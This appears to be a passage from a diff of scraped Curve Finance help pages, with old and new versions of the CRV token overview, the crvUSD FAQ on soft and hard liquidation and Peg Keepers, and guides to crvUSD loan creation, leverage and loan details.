Boosting Voting The CRV Matrix Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Understanding $CRV Staking (trading fees) Boosting Voting The CRV Matrix Understanding crv Understanding $CRV The main purposes of the Curve DAO token are to incentivise liquidity providers on the Curve Finance platform as well as getting as many users involved as possible in the governance of the protocol. Currently CRV has three main uses: voting, staking and boosting. Those three things will require you to vote lock your CRV and acquire veCRV. veCRV stands for vote-escrowed CRV, it is simply CRV locked for a period of time. The longer you lock CRV for, the more veCRV you receive. Staking (trading fees) CRV can now be staked (locked) to receive trading fees from the Curve protocol. A community-lead proposal introduced a 50% admin fee on all trading fees. Those fees are collected and used to buy 3CRV, the LP token for the TriPool, which are then distributed to veCRV holders. Staking your $CRV Calculating Yield Boosting One of the main incentive for CRV is the ability to boost your rewards on provided liquidity. Vote locking CRV allows you to acquire voting power to participate in the DAO and earn a boost of up to 2.5x on the liquidity you are providing on Curve. Boosting your CRV Rewards Voting Once CRV holders vote-lock their veCRV, they can start voting on various DAO proposals and pool parameters. Proposals The CRV Matrix The table below can help you understand the value add of veCRV. Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV Understanding CRV Table of contents Staking (trading fees) Boosting Voting The CRV Matrix CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Staking (trading fees) Boosting Voting The CRV Matrix Home $CRV Token Understanding CRV The main purposes of the Curve DAO token are to incentivise liquidity providers on the Curve Finance platform as well as getting as many users involved as possible in the governance of the protocol. Currently CRV has three main uses: voting, staking and boosting. Those three things will require you to vote lock your CRV and acquire veCRV. veCRV stands for vote-escrowed CRV, it is simply CRV locked for a period of time. The longer you lock CRV for, the more veCRV you receive. Staking (trading fees) CRV can now be staked (locked) to receive trading fees from the Curve protocol. A community-lead proposal introduced a 50% admin fee on all trading fees. Those fees are collected and used to buy 3CRV, the LP token for the TriPool, which are then distributed to veCRV holders. Staking your $CRV Calculating Yield Boosting One of the main incentive for CRV is the ability to boost your rewards on provided liquidity. Vote locking CRV allows you to acquire voting power to participate in the DAO and earn a boost of up to 2.5x on the liquidity you are providing on Curve. Boosting your CRV Rewards Voting Once CRV holders vote-lock their veCRV, they can start voting on various DAO proposals and pool parameters. Proposals The CRV Matrix The table below can help you understand the value add of veCRV. 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "FAQ", + "title": "crvUSD FAQ", "html_url": "https://resources.curve.fi/crvusd/faq/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ FAQ Table of contents $crvUSD FAQ General What is $crvUSD and how does it work? How does the $crvUSD liquidation process differ from other debt-based stablecoins? How is $crvUSD pegged to a price of $1? Can other types of collateral be proposed for crvUSD? How does that process work? Liquidation Process What is my liquidation price? When depositing collateral, how do I adjust and select my collateral deposit price range? What happens when the collateral price drops into my selected range? What happens if the collateral price recovers? Under what circumstances can I be liquidated? How do I maintain my loan health if collateral price drops into my range? What happens to the collateral in the event of hard liquidation? What is a liquidation discount and how is the 'liquidation discount' calculated during a liquidation? Peg Keepers What are Peg Keepers? Under what circumstances can the Peg Keepers mint or burn $crvUSD? What is the relationship between a Peg Keeper's debt and the total debt in crvUSD? What does it mean if the Peg Keeper's debt is zero? How does Peg Keeper trade and distribute profits? Borrow Rate What is the Borrow Rate? How is the $crvUSD Borrow Rate calculated? Safety and Risks What are the risks of using $crvUSD How can I best manage my risks when providing liquidity or borrowing in crvUSD? Has $crvUSD been audited? Can I see the code? $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents $crvUSD FAQ General What is $crvUSD and how does it work? How does the $crvUSD liquidation process differ from other debt-based stablecoins? How is $crvUSD pegged to a price of $1? Can other types of collateral be proposed for crvUSD? How does that process work? Liquidation Process What is my liquidation price? When depositing collateral, how do I adjust and select my collateral deposit price range? What happens when the collateral price drops into my selected range? What happens if the collateral price recovers? Under what circumstances can I be liquidated? How do I maintain my loan health if collateral price drops into my range? What happens to the collateral in the event of hard liquidation? What is a liquidation discount and how is the 'liquidation discount' calculated during a liquidation? Peg Keepers What are Peg Keepers? Under what circumstances can the Peg Keepers mint or burn $crvUSD? What is the relationship between a Peg Keeper's debt and the total debt in crvUSD? What does it mean if the Peg Keeper's debt is zero? How does Peg Keeper trade and distribute profits? Borrow Rate What is the Borrow Rate? How is the $crvUSD Borrow Rate calculated? Safety and Risks What are the risks of using $crvUSD How can I best manage my risks when providing liquidity or borrowing in crvUSD? Has $crvUSD been audited? Can I see the code? FAQ $crvUSD FAQ General What is $crvUSD and how does it work? $crvUSD refers to a dollar-pegged stablecoin, which may be minted by a decentralized protocol developed by Curve Finance. Users can mint $crvUSD by posting collateral and opening a loan within this protocol. How does the $crvUSD liquidation process differ from other debt-based stablecoins? $crvUSD uses an innovative mechanism to reduce the risk of liquidations. Instead of instantly triggering a liquidation at a specific price, a users collateral is converted into stablecoins across a smooth range of prices. Simulations suggest most price drops would result in the loss of just a few percentage points worth of collateral value, instead of the instant and total loss implemented by the liquidation process common to most debt-based stablecoins. How is $crvUSD pegged to a price of $1? The $crvUSD peg is broadly protected by the fact that the protocol is always overcollateralized. The protocol employs a number of stabilization mechanisms to fine-tune this peg. One mechanism is to automatically adjust borrow rates based on supply and demand. The protocol also relies on Peg Keepers (see below section), which are authorized to burn or mint $crvUSD based on market conditions. Can other types of collateral be proposed for crvUSD? How does that process work? Yes, other collateral markets can be proposed for $crvUSD through governance. Contact the community support channels for additional information on the current process to propose new collateral types. Each approved collateral has its own $crvUSD market. Liquidation Process What is my liquidation price? At the start of the $crvUSD loan process, collateral is deposited and equally distributed over a range of prices rather than one single liquidation price. When the price falls within this range, your collateral begins its conversion into $crvUSD, a process that helps maintain the health of your loan and, in most circumstances, prevents a liquidation. Thus, you do not have one specific liquidation price. When depositing collateral, how do I adjust and select my collateral deposit price range? This price range can optionally be adjusted and customized when initially creating a loan. In the UI, look for the advanced mode toggle which will provide more information on this range as well as an Adjust button that allows you to fine-tune this range. What happens when the collateral price drops into my selected range? Each $crvUSD market is attached to an AMM. When the collateral price drops into your selected range, this collateral can be traded in the AMM. When this happens, traders can purchase your collateral and replace it with $crvUSD. This has the effect of leaving your loan collateralized by stablecoins, which better hold value and maintain your loan health. NOTE: This process was initially referred to as soft liquidation. This term is being phased out to avoid confusion with the harder liquidation process in which a loan is closed and collateral is sold off. What happens if the collateral price recovers? While collateral price rises, the above process happens in reverse. Your position is traded via the AMM from $crvUSD back into your original collateral. Due to AMM trading fees, you may find you have lost a few percentage points worth of your original collateral value once the collateral price is again above the top end of your selected liquidation range. Under what circumstances can I be liquidated? Should your loan health drop below 0%, you are eligible to for liquidation. In liquidation, your collateral is sold off and your position closes. While the $crvUSD collateral conversion AMM mechanism aims to protect against liquidations, it may be unable to keep pace with severe price swings. Borrowers are recommended to maintain loan health, particularly when prices drop within the selected liquidation range. How do I maintain my loan health if collateral price drops into my range? Once collateral price drops into your liquidation range, you are not permitted to add new collateral to protect your loan health. With collateral price inside your liquidation range, the only way to increase your loan health is to repay $crvUSD. Even small $crvUSD repayments while collateral price is within your liquidation range can be helpful in preventing a liquidation. What happens to the collateral in the event of hard liquidation? In the event of a hard liquidation, all available collateral is sold off by the AMM system, the debt is covered, and the loan is closed. What is a liquidation discount and how is the 'liquidation discount' calculated during a liquidation? The 'liquidation discount' is calculated based on the collateral's market value and is designed to incentivize liquidators to participate in the liquidation process. This factor is used to effectively discount the collateral valuation when calculating the health for liquidation purposes. In other protocols, this may be referred to as a liquidation threshold and is often hard-coded instead of calculated dynamically. Peg Keepers What are Peg Keepers? The Peg Keepers are contracts uniquely enabled to mint and absorb debt in $crvUSD for the purposes of trading near the peg. Under what circumstances can the Peg Keepers mint or burn $crvUSD? Each Peg Keeper targets a specific Peg Keeper pool . A Peg Keeper pool is a Curve v1 pool allowing trading between $crvUSD and a blue chip stablecoin. The Peg Keepers are responsible for trying to balance these pools by trading at a profit. The Peg Keepers can only mint $crvUSD to trade into their associated pools when its pool balance of $crvUSD is too low, or it can repurchase and burn the $crvUSD if its pool balance is too high. What is the relationship between a Peg Keeper's debt and the total debt in crvUSD? A Peg Keeper's debt is the amount of $crvUSD it has deposited into a specific pool. Total debt in $crvUSD includes all outstanding $crvUSD that has been borrowed across the system. What does it mean if the Peg Keeper's debt is zero? If a Peg Keeper's debt is zero, it means that the Peg Keeper has no outstanding debt in the $crvUSD system. How does Peg Keeper trade and distribute profits? Every Peg Keeper has a public update function. If the Peg Keeper has accumulated profits, then a portion of these profits are distributed at the behest of the user who calls the update function, in order to incentivize distributed trading in the pools. To access this on Etherscan, you can visit LLAMMA details on the $crvUSD UI within any market. Click the Monetary Policy link to visit Etherscan. On Etherscan, click the Contract tab and the Read Contract tab underneath. Under function 6 (peg_keepers) type the index value of the market you are interested in. The index value ranges from 0 to n-1 where n is the number of $crvUSD markets. Click on the link returned, again click Contract and Read Contract to access the function 6 (estimate_caller_profit) to know the minimum tokens you would receive. To call the function, select the Write Contract tab, connect your wallet, and call function 1 (update) Borrow Rate What is the Borrow Rate? The Borrow Rate is the variable interest rate charged on active loans within each collateral market. How is the $crvUSD Borrow Rate calculated? The Borrow Rate for each $crvUSD collateral market is calculated based on a series of parameters, including the Peg Keeper's debt, the total debt, and the market demand for borrowing. Safety and Risks What are the risks of using $crvUSD As with all cryptocurrencies, $crvUSD carries several risks, including depeg risks and risk of liquidation of your collateral. Make sure to read the disclaimer and exercise caution when interacting with smart contracts. How can I best manage my risks when providing liquidity or borrowing in crvUSD? Best risk management practices include maintaining a safe collateralization ratio, understanding the potential for liquidation, and keeping an eye on market conditions. Has $crvUSD been audited? Yes, you may read the full $crvUSD MixByte audit and other audits for Curve may be published to Github . Can I see the code? The code is publicly available on the Curve Github . Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ crvUSD FAQ Table of contents General What is crvUSD and how does it work? How does the crvUSD liquidation process differ from other debt-based stablecoins? How is crvUSD pegged to a price of $1? Can other types of collateral be proposed for crvUSD? How does that process work? Liquidation Process What is my liquidation price? When depositing collateral, how do I adjust and select my collateral deposit price range? What happens when the collateral price drops into my selected range? (soft-liquidation) What happens if the collateral price recovers? (de-liquidation) Under what circumstances can I be liquidated? (hard-liquidation) How do I maintain my loan health if collateral price drops into my range? What happens to the collateral in the event of hard liquidation? What is a liquidation discount and how is the 'liquidation discount' calculated during a liquidation? Peg Keepers What are Peg Keepers? Under what circumstances can the Peg Keepers mint or burn crvUSD? What is the relationship between a Peg Keeper's debt and the total debt in crvUSD? What does it mean if the Peg Keeper's debt is zero? How does Peg Keeper trade and distribute profits? Borrow Rate What is the Borrow Rate? How is the crvUSD Borrow Rate calculated? Safety and Risks What are the risks of using crvUSD How can I best manage my risks when providing liquidity or borrowing in crvUSD? Has crvUSD been audited? Can I see the code? Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents General What is crvUSD and how does it work? How does the crvUSD liquidation process differ from other debt-based stablecoins? How is crvUSD pegged to a price of $1? Can other types of collateral be proposed for crvUSD? How does that process work? Liquidation Process What is my liquidation price? When depositing collateral, how do I adjust and select my collateral deposit price range? What happens when the collateral price drops into my selected range? (soft-liquidation) What happens if the collateral price recovers? (de-liquidation) Under what circumstances can I be liquidated? (hard-liquidation) How do I maintain my loan health if collateral price drops into my range? What happens to the collateral in the event of hard liquidation? What is a liquidation discount and how is the 'liquidation discount' calculated during a liquidation? Peg Keepers What are Peg Keepers? Under what circumstances can the Peg Keepers mint or burn crvUSD? What is the relationship between a Peg Keeper's debt and the total debt in crvUSD? What does it mean if the Peg Keeper's debt is zero? How does Peg Keeper trade and distribute profits? Borrow Rate What is the Borrow Rate? How is the crvUSD Borrow Rate calculated? Safety and Risks What are the risks of using crvUSD How can I best manage my risks when providing liquidity or borrowing in crvUSD? Has crvUSD been audited? Can I see the code? Home $crvUSD crvUSD FAQ General What is crvUSD and how does it work? crvUSD refers to a dollar-pegged stablecoin, which may be minted by a decentralized protocol developed by Curve Finance. Users can mint crvUSD by posting collateral and opening a loan within this protocol. How does the crvUSD liquidation process differ from other debt-based stablecoins? crvUSD uses an innovative mechanism to reduce the risk of liquidations. Instead of instantly triggering a liquidation at a specific price, a users collateral is converted into stablecoins across a smooth range of prices. Simulations suggest most price drops would result in the loss of just a few percentage points worth of collateral value, instead of the instant and total loss implemented by the liquidation process common to most debt-based stablecoins. How is crvUSD pegged to a price of $1? The crvUSD peg is broadly protected by the fact that the protocol is always overcollateralized. The protocol employs a number of stabilization mechanisms to fine-tune this peg. One mechanism is to automatically adjust borrow rates based on supply and demand. The protocol also relies on Peg Keepers (see below section), which are authorized to burn or mint crvUSD based on market conditions. Can other types of collateral be proposed for crvUSD? How does that process work? Yes, other collateral markets can be proposed for crvUSD through governance. Contact the community support channels for additional information on the current process to propose new collateral types. Each approved collateral has its own crvUSD market. Liquidation Process What is my liquidation price? At the start of the crvUSD loan process, collateral is deposited and equally distributed over a range of prices, not just a single liquidation price. Should the price fall within this range, the collateral begins its conversion into crvUSD. This process aids in maintaining the loan's health and, under most conditions, wards off liquidation. As a result, there isn't one specific liquidation price. When depositing collateral, how do I adjust and select my collateral deposit price range? The price range can be optionally adjusted and customized during the initial loan creation process. In the UI, the advanced mode toggle provides further insights into this range. It also presents an Adjust button, enabling users to fine-tune their preferred price range. What happens when the collateral price drops into my selected range? (soft-liquidation) Each crvUSD market is linked to an Automated Market Maker (AMM). If the collateral price falls into the selected range, this collateral becomes tradable in the AMM. At this juncture, traders have the opportunity to acquire the collateral, substituting it with crvUSD. Consequently, the loan becomes collateralized by stablecoins, known for their more reliable value retention, contributing to the sustained health of the loan. What happens if the collateral price recovers? (de-liquidation) As the collateral price increases, the aforementioned process reverses. The position undergoes trading through the AMM, transitioning from crvUSD back to the original form of collateral. Owing to AMM trading fees, it's typical for a slight percentage of the original collateral value to be diminished once the collateral price surpasses the upper limit of the predetermined liquidation range. Under what circumstances can I be liquidated? (hard-liquidation) Should a loan's health drop below 0%, it becomes eligible for liquidation. In this scenario, the collateral is sold off, and the position closes. Although the crvUSD collateral conversion mechanism within the AMM is designed to protect against liquidations, it might not keep up with severe price fluctuations. It is advisable for borrowers to maintain their loan health, especially when prices fall within the selected liquidation range. How do I maintain my loan health if collateral price drops into my range? When the collateral price falls into the liquidation range, adding new collateral to protect loan health is not permitted. Within this liquidation range, loan health can only be improved by repaying crvUSD. Even minimal crvUSD repayments can be effective in preventing liquidation while the collateral price resides within this range. What happens to the collateral in the event of hard liquidation? In the event of a hard liquidation, all available collateral is sold off by the AMM system, the debt is covered, and the loan is closed. What is a liquidation discount and how is the 'liquidation discount' calculated during a liquidation? The 'liquidation discount' is calculated based on the collateral's market value and is designed to incentivize liquidators to participate in the liquidation process. This factor is used to effectively discount the collateral valuation when calculating the health for liquidation purposes. In other protocols, this may be referred to as a liquidation threshold and is often hard-coded instead of calculated dynamically. Peg Keepers What are Peg Keepers? The Peg Keepers are contracts uniquely enabled to mint and absorb debt in crvUSD for the purposes of trading near the peg. Under what circumstances can the Peg Keepers mint or burn crvUSD? Each Peg Keeper targets a specific Peg Keeper pool . A Peg Keeper pool is a Curve v1 pool allowing trading between crvUSD and a blue chip stablecoin. The Peg Keepers are responsible for trying to balance these pools by trading at a profit. The Peg Keepers can only mint crvUSD to trade into their associated pools when its pool balance of crvUSD is too low, or it can repurchase and burn the crvUSD if its pool balance is too high. What is the relationship between a Peg Keeper's debt and the total debt in crvUSD? A Peg Keeper's debt is the amount of crvUSD it has deposited into a specific pool. Total debt in crvUSD includes all outstanding crvUSD that has been borrowed across the system. What does it mean if the Peg Keeper's debt is zero? If a Peg Keeper's debt is zero, it means that the Peg Keeper has no outstanding debt in the crvUSD system. How does Peg Keeper trade and distribute profits? Every Peg Keeper has a public update function. If the Peg Keeper has accumulated profits, then a portion of these profits are distributed at the behest of the user who calls the update function, in order to incentivize distributed trading in the pools. To access this information on Etherscan, one can visit the LLAMMA details on the crvUSD UI within any market. By clicking the Monetary Policy link, users are directed to Etherscan. There, under the Contract tab, they should select the Read Contract tab. Function 6 (peg_keepers) requires the index value of the market of interest, ranging from 0 to n-1, where n represents the number of crvUSD markets. After entering this index and clicking on the returned link, users should repeat the process by selecting Contract and Read Contract. This time, they access function 6 (estimate_caller_profit) to understand the minimum tokens receivable. For function execution, the Write Contract tab must be selected, a wallet connected, and function 1 (update) called. Borrow Rate What is the Borrow Rate? The Borrow Rate is the variable interest rate charged on active loans within each collateral market. How is the crvUSD Borrow Rate calculated? The Borrow Rate for each crvUSD collateral market is calculated based on a series of parameters, including the Peg Keeper's debt, the total debt, and the market demand for borrowing. Safety and Risks What are the risks of using crvUSD As with all cryptocurrencies, crvUSD carries several risks, including depeg risks and risk of liquidation of a users collateral. Make sure to read the disclaimer and exercise caution when interacting with smart contracts. How can I best manage my risks when providing liquidity or borrowing in crvUSD? Best risk management practices include maintaining a safe collateralization ratio, understanding the potential for liquidation, and keeping an eye on market conditions. Has crvUSD been audited? Yes, please read the full crvUSD MixByte audit and other audits for Curve may be published to Github . Can I see the code? The code is publicly available on the Curve Github . 2023-10-18 Back to top", "labels": [ "Documentation" ] }, { - "title": "Loan creation", + "title": " ", "html_url": "https://resources.curve.fi/crvusd/loan-creation/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan creation Table of contents Loan Creation Leveraging Loans Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Loan Creation Leveraging Loans Loan creation Loan Creation In standard mode, creating a loan using $crvUSD only requires setting how much of the collateral asset you would like to add, and how much $crvUSD you would like to borrow in return. After you have set your collateral amount, the UI will display the maximum amount you can borrow. The UI includes a dropdown for additional loan parameters like the current Oracle Price and Borrow Rate . Loan Parameters A: The amplification parameter A defines the density of liquidity and band size. Base Price: The base price is the price of the band number 0. Oracle Price: The oracle price is the current price of the collateral as determined by the oracle. The oracle price is used to calculate the collateral's value and the loan's health. Borrow Rate: The borrow rate is the annual interest rate charged on the loan. This rate is variable and can change based on market conditions. The borrow rate is expressed as a percentage. For example, a borrow rate of 7.62% means that you will be charged 7.62% interest per year on the outstanding balance of your loan. You can toggle advanced mode in the upper right-hand side of the screen. The advanced mode adds a display with more information about the current distribution across all the bands within the entire LLAMMA . It also enhances the loan creation interface by displaying the liquidation and band range, number of bands, borrow rate, and Loan to Value ratio (LTV). Additionally, users can manually select the number of bands for the loan by pressing the \"adjust\" button and using the slider to increase or decrease the number of bands. Leveraging Loans The UI provides the option to leverage your loan. You can leverage your collateral up to 9x. This has the effect of repeat trading crvUSD to collateral and depositing to maximize your collateral position. Here explains how leveraging works well. Be careful: if the collateral price dips, you must repay the entire amount to reclaim your initial position. WARNING: The corresponding deleverage button is also not yet available. Toggling the advanced mode expands the display to show additional information about the loan, including the price impact and trade route. Last update: 2023-09-20 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Creation & Management Table of contents Loan Creation Loan Management Leveraging Loans Deleveraging Loans Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Loan Creation Loan Management Leveraging Loans Deleveraging Loans Home $crvUSD Loan Creation In standard mode, creating a loan with crvUSD involves setting the amount of collateral asset to be added and the quantity of crvUSD desired for borrowing. Once the collateral amount is determined, the UI displays the maximum sum available for borrowing, along with the health and borrow rate. The UI includes a dropdown to see additional loan parameters like the current Oracle Price and Borrow Rate . In the upper right-hand side of the screen, there is a toggle for advanced mode. The advanced mode adds an additional display with more information about the current distribution across all the bands within the entire LLAMMA . It also enhances the loan creation interface by displaying the liquidation and band range, number of bands, borrow rate, and Loan to Value ratio (LTV). Additionally, users can manually select the number of bands for the loan by pressing the \"adjust\" button and using the slider to increase or decrease the number of bands. Tip A higher number of bands results in fewer losses when the loan is in soft-liquidation mode, see here . The maximum number of bands is 50, while the minimum is 4. Loan Management Everything needed to manage a loan is available in this interface. The features include: Loan This tab provides options to Borrow more crvUSD, Repay debt, or Self-Liquidate a loan Collateral Options to add or remove collateral from a loan are available here. Deleverage This tab facilitates loan deleveraging. Find more details here . Info During soft-liquidation, users are unable to add or withdraw collateral. They can choose to either partially or fully repay their crvUSD debt to improve their health ratio or decide to self-liquidate their loan if their collateral composition contains sufficient crvUSD to cover the outstanding debt. If they opt for self-liquidation, the user's debt is fully repaid and the loan will be closed. Any residual amounts are then returned to the user. Leveraging Loans The UI offers a leveraging feature for loans, accessible by navigating to the 'Leverage' tab. More infomation on how to deleverage a loan here . Info Collateral can be leveraged up to 9x, depending on the number of bands chosen. If a user wants to use the maximum leverage (9x), they loan will have the minimum number of bands (4). Using the highest number of bands (50) only allows for a leverage of up to 3x. For the consequences of using different numbers of bands, see here . The process of leveraging effectively involves repeat trading of crvUSD for collateral and depositing it to maximize the collateral position. Essentially, all borrowed crvUSD is utilized to acquire more collateral. Caution is advised, as a dip in the collateral price would necessitate repaying the entire amount to reclaim the initial position. Here is a good explainer on how leveraging works. Toggling the advanced mode expands the display to show additional information about the loan, including the price impact, trade route and the actual leverage. Deleveraging Loans Deleveraging a loan irrespective of it being leveraged is an option available through the UI. Users must navigate to the 'Deleverage' tab and input the amount of collateral they intend to allocate for deleveraging. This particular collateral is then converted into crvUSD, which is used to facilitate debt repayment. Info When a user's loan is in soft liquidation, deleveraging is only possible if the loan is fully repaid. Apart from that, the loan can typically be self-liquidated. If the position is not in soft liquidation, the user can deliberately deleverage by any chosen amount. The UI will provide the user with their updated loan details, such as liquidation and band range, borrow rate, and health, as well as the LLAMMA changes of collateral and debt. 2023-10-25 Back to top", "labels": [ "Documentation" ] }, { - "title": "Loan details", + "title": "Loan Details & Concepts", "html_url": "https://resources.curve.fi/crvusd/loan-details/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Loan details Table of contents Loan Management Loan Details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Loan Management Loan Details Loan details The Loan Details page shows you information about your loan as well as features to manage your loan. Loan Management Everything you may need to manage your loan is in the dark blue box on the left side of the page. These features include: Loan: Borrow more Repay Self-Liquidate Collateral: Add Remove During soft-liquidation, users are unable to add or withdraw collateral. They can choose to either partially or fully repay their crvUSD debt to improve their health ratio or decide to self-liquidate their loan if their collateral composition contains sufficient crvUSD to cover the outstanding debt. If they opt for self-liquidation, the user's debt is fully repaid and the loan will be closed. Any residual amounts are then returned to the user. Loan Details When you take out a loan with $crvUSD your collateral is spread over a range of liquidation prices. If the asset price drops within this range, you will enter soft liquidation mode. In soft liquidation mode you cannot add more collateral, your only available actions are to repay your loan with $crvUSD or to self-liquidate yourself. Additional displays show information about the entire LLAMMA , including the amount of total debt, as well as your wallet balance. In the upper righthand side of the screen you can toggle advanced mode to get additional information on your loan. In advanced mode the UI changes to show more information about your collateral bands . Advanced mode also adds a tab with more info about the entire LLAMMA . Last update: 2023-09-12 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts Loan Details & 